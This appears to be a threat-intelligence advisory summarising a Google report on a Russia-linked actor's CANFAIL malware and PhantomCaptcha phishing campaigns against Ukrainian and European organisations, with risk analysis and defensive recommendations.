Google Threat Intelligence Group (GTIG) has attributed a series of malware attacks to a previously undocumented threat actor suspected to be affiliated with Russian intelligence services. This actor targets Ukrainian organizations primarily in defense, military, government, and energy sectors, but has also expanded interest to aerospace, manufacturing with military and drone ties, nuclear and chemical research, and international humanitarian organizations involved in the Ukraine conflict. The malware used, CANFAIL, is an obfuscated JavaScript payload that executes a PowerShell script to download and run a memory-only PowerShell dropper, minimizing forensic footprints. Victims see a fake error message to mask the infection. The threat actor conducts phishing campaigns impersonating legitimate Ukrainian and Romanian energy companies to steal credentials and gain unauthorized access to organizational and personal email accounts. They generate targeted email lists based on regional and industry research and use large language models (LLMs) to improve reconnaissance, social engineering lure creation, and technical post-compromise activities, including command-and-control infrastructure setup. The group is also linked to the PhantomCaptcha campaign, which uses phishing emails directing victims to fake pages with instructions to activate infections delivering WebSocket-based trojans. This campaign targets organizations involved in Ukraine's war relief efforts. While less sophisticated than other Russian groups, the use of AI tools and tailored social engineering increases their operational effectiveness. No known exploits in the wild have been reported, and no patches are available due to the malware nature of the threat. The campaign's focus on critical infrastructure and sensitive sectors indicates a strategic espionage and disruption intent.

European organizations, especially those with ties to Ukraine or operating in critical infrastructure sectors such as energy, defense, aerospace, manufacturing with military applications, nuclear and chemical research, and humanitarian aid, face significant risks from this threat. Compromise of email accounts can lead to credential theft, lateral movement, espionage, and disruption of operations. The use of memory-only droppers complicates detection and forensic analysis, increasing dwell time and potential damage. The phishing campaigns leveraging regional and industry-specific lures increase the likelihood of successful compromise. Additionally, the threat actor's use of AI-enhanced reconnaissance and social engineering could enable more precise and effective attacks against European entities supporting Ukraine or involved in related sectors. Neighboring countries like Romania and Moldova have already been targeted for reconnaissance and phishing, indicating a broader regional threat. The potential impact includes loss of sensitive information, operational disruption, and undermining of critical infrastructure resilience, which could have cascading effects on European security and stability.

European organizations should implement targeted defenses beyond generic phishing awareness. This includes deploying advanced email filtering solutions capable of detecting obfuscated JavaScript and suspicious archive files, especially those with double extensions like *.pdf.js. Implementing multi-factor authentication (MFA) on all email and critical systems is essential to reduce the risk of credential theft exploitation. Network monitoring should focus on detecting unusual PowerShell activity and memory-only execution techniques, leveraging endpoint detection and response (EDR) tools with behavioral analytics tuned to detect living-off-the-land (LotL) tactics. Organizations should conduct threat hunting exercises looking for indicators of CANFAIL and PhantomCaptcha activity, including suspicious Google Drive links and WebSocket connections. Sharing threat intelligence with national cybersecurity centers and industry peers will improve detection and response capabilities. Given the use of LLMs by attackers, training programs should include awareness of AI-enhanced social engineering tactics. Finally, organizations should review and harden their incident response plans to rapidly contain and remediate infections involving stealthy malware and credential compromise.